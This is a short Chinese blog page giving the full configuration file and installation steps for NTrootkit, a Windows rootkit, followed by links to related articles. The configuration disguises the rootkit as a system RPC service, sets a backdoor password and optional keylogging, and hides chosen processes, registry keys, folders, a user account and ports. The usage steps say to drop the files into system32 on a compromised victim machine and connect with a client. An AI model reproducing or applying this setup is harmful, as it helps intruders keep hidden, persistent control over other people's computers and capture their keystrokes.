Rootkit之ntrootkit的配置使用

NTrootkit

一,配置方法

\\filename:ntrootkit.ini
\\This is the init file of yyt_hac‘s ntrootkit,please modify it correctly or the rootkit
\\can‘t be installed!!!
[GLOBAL]     //下面为配置内容
\\servicename is the ntrootkit ‘s servicename
servicename=tsserver       //服务名
servdispname=rpcsvr
servdescription=windows system rpc server
installdir=com\sserver      //安装目录
connpass=12345             //连接密码
appname=51cto.exe 
keylog=0                       //0为不记录键盘
workmode=1                  //0为sniffer模式
[HIDDEN PROCNAME]     //要隐藏的服务名

51cto
[HIDDEN REGKEY]    //要隐藏的注册表键

zero\soft\...\...\xxx

[HIDDEN REGVALUE]   //要隐藏的注册表键值

zero\soft\...\...

[HIDDEN FILEDIR]  //要隐藏的文件目录

c:\rootkit

[HIDDEN SERVICE]  //要隐藏的服务名

servicert
[HIDDEN USER]  //要隐藏的用户名

zerosecurity
[HIDDEN TCPPORT]  //要隐藏的tcp端口
tcpport=5768

[HIDDEN UDPPORT]  //要隐藏的udp端口
udpport=4000

二,使用方法

①:将配置文件 .ini和服务端ntrootkit.exe放入肉鸡的 system32目录下,然后运行ntrootkit.exe安装;ntrootkit -u password 可卸载;

②:客户端用rtclient连接;

时间: 2024-10-24 22:49:32

Rootkit之ntrootkit的配置使用的相关文章

Rootkit Hacking Technology && Defence Strategy Research

目录 1. The Purpose Of Rootkit 2. Syscall Hijack 3. LKM Module Hidden 4. Network Communication Hidden 5. File Hidden 6. Process Hidden 7. Hidden Port Remote Reverse Connections 8. Programe Replacing 1. The Purpose Of Rootkit Basically, the purpose of r

Mysql安全配置

相关学习资料 http://drops.wooyun.org/tips/2245 http://www.cnblogs.com/siqi/archive/2012/11/21/2780966.html http://hi.baidu.com/liveinyc/item/08d5e71cfb2872416926bb84 http://blog.chinaunix.net/uid-16728139-id-3683449.html http://linux.chinaunix.net/techdoc/

apache的安全增强配置(使用mod_chroot,mod_security)

apache的安全增强配置(使用mod_chroot,mod_security) 作者:windydays      2010/8/17 LAMP环境的一般入侵,大致经过sql注入,上传webshell,本地提权至root,安装rootkit等步骤.采用如下的配置,mod_chroot和单独分区挂载可以让本地提权变得极为困难,而mod-security可以封堵一般的sql注入等应用层攻击. 以下内容是在ubuntu10.04上实践以后总结出来的,直接上命令,就不做过多解释了,水平有限,错误在所难

Linux Rootkit Sample && Rootkit Defenser Analysis

目录 1. 引言 2. LRK5 Rootkit 3. knark Rootkit 3. Suckit(super user control kit) 4. adore-ng 5. WNPS 6. Sample Rootkit for Linux 7. suterusu 8. Rootkit Defense Tools 9. Linux Rootkit Scanner: kjackal 1. 引言 This paper attempts to analyze the characteristic

GPU keylogger && GPU Based rootkit(Jellyfish rootkit)

catalog 1. OpenCL 2. Linux DMA(Direct Memory Access) 3. GPU rootkit PoC by Team Jellyfish 4. GPU keylogger 5. DMA Hack 1. OpenCL OpenCL(Open Computing Language)是第一个面向异构系统通用目的并行编程的开放式.免费标准,也是一个统一的编程环境,便于软件开发人员为高性能计算服务器.桌面计算系统.手持设备编写高效轻便的代码,而且广泛适用于多核心处

Mysql安全配置【转】

相关学习资料 http://drops.wooyun.org/tips/2245 http://www.cnblogs.com/siqi/archive/2012/11/21/2780966.html http://hi.baidu.com/liveinyc/item/08d5e71cfb2872416926bb84 http://blog.chinaunix.net/uid-16728139-id-3683449.html http://linux.chinaunix.net/techdoc/

OSSEC 加固linux系统详细配置

ossec官方网站http://www.ossec.net/ ossec帮助文档http://ossec-docs.readthedocs.org/en/latest/manual/index.html OSSEC是一个开源的基于主机的入侵检测系统,执行日志分析,文件完整性检查,政策监控,rootkit检测,实时报警和积极响应. 它可以运行在大多数的操作系统,包括Linux,MacOS的时,Solaris,HP-UX,AIX和Windows 最新稳定版为2.8 下载页面http://www.os

Linux Rootkit Learning

目录 1. 学习Rootkit需要了解的基础知识 2. 挂钩(HOOKING) 3. 直接内核对象操作 4. LSM框架(Linux Security Module)于LKM安全 5. rootkit检测技术及工具 1. 学习Rootkit需要了解的基础知识 0x1: 什么是rootkit rootkit是允许某人控制操作系统的特定方面而不暴露他或她的踪迹的一组代码.从根本上说来,用户无法察觉这种特性构成了rootkit.rootkit会想尽办法去隐藏自己的网络.进程.I/O等信息(注意,这里所

Linux UserSpace Back-Door、Rootkit Attack And Defensive Tchnology

catalog 0. 引言 1. Pam后门 2. SSH后门 3. Hijacking SSH 4. Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication 5. Hijacking Active SSH Screen Sessions 0. 引言 0x1: 安全攻防观点 1. Know Your Enemy : K